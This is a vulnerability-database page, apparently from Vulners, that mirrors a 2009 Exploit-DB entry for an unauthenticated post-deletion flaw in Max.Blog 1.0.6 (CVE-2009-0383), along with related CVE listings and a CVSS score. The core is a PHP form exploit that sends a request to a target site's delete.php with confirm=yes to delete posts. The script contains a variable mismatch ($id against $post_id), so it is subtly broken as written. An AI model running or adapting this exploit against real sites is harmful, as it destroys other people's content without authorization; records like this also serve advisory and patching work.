Lucene search
+L

Max.Blog 1.0.6 - Arbitrary Delete Post

🗓️ 20 Jan 2009 00:00:00Reported by SirGodType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

Max.Blog 1.0.6 Arbitrary Delete Post Exploit by SirGo

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-0383
20 Jan 200900:00
circl
cve
CVE
CVE-2009-0383
2 Feb 200919:00
cve
cvelist
Cvelist
CVE-2009-0383
2 Feb 200919:00
cvelist
euvd
EUVD
EUVD-2009-0387
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-0383
2 Feb 200919:30
nvd
prion
Prion
Server side request forgery (ssrf)
2 Feb 200919:30
prion
ptsecurity
Positive Technologies
PT-2009-3042 · Max · Max.Blog
2 Feb 200900:00
ptsecurity
<html>
<head>
<title>Max.Blog 1.0.6 Delete Post Exploit</title>
</head>

<body>
<p align="center">
<b>Max.Blog 1.0.6 Delete Post Exploit</b><br /><br />
<b>Discovered by <b>SirGod</b><br />
Thanks to <b>Nytro</b><br />
Please visit : <br />
------------------------<br />
www.mortal-team.org<br />
------------------------<br />
www.h4cky0u.org<br />
------------------------<br />
www.xpl0it.info<br />
------------------------<br />
www.anti-intruders.org<br />
------------------------<br />
</b>
</p>

<?php
if(isset($_POST['submit']))
{
    $site=$_POST['site'];
	$id=$_POST['post_id'];
	$pagina=file_get_contents("http://".$site."/delete.php?post=".$post_id."&confirm=yes");
	print "<p align=\"center\">Done!</p><br />";
}

?>

<form method="POST">
<p align="center">
Site: www. <input type="text" name="site" value="site.com/path" /><br
/> (without http,www and trailing slash)<br />
Post ID: <input type="text" name="post_id" value="1" /><br /><br />
<input type="submit" name="submit" value="Delete" />
</p>
</form>
</body>
</html>

# milw0rm.com [2009-01-20]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jan 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.4
EPSS0.02958
35